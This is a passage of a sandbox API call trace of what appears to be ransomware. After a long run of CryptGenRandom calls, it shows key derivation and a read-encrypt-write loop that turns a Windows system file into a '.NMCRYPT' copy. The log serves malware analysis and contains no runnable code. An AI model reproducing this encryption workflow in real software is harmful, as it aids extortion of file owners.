dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.688] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.689] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.689] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0152.689] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.689] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad878) returned 1 [0152.689] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0152.689] CryptSetKeyParam (hKey=0x9ad878, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0152.689] wcslen (_String="\\\\?\\") returned 0x4 [0152.689] CryptDuplicateKey (in: hKey=0x9ad878, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2b8) returned 1 [0152.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0152.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0152.690] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=10752) returned 1 [0152.690] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0152.690] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.692] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.692] GetLastError () returned 0x0 [0152.692] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.693] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.693] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.693] GetLastError () returned 0x0 [0152.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.693] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.693] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.693] GetLastError () returned 0x0 [0152.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.693] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.693] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.693] GetLastError () returned 0x0 [0152.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.693] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.693] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.693] GetLastError () returned 0x0 [0152.693] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.693] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.693] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.693] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0152.694] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0152.694] GetLastError () returned 0x0 [0152.694] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0152.694] ReadFile (in: hFile=0x1624, 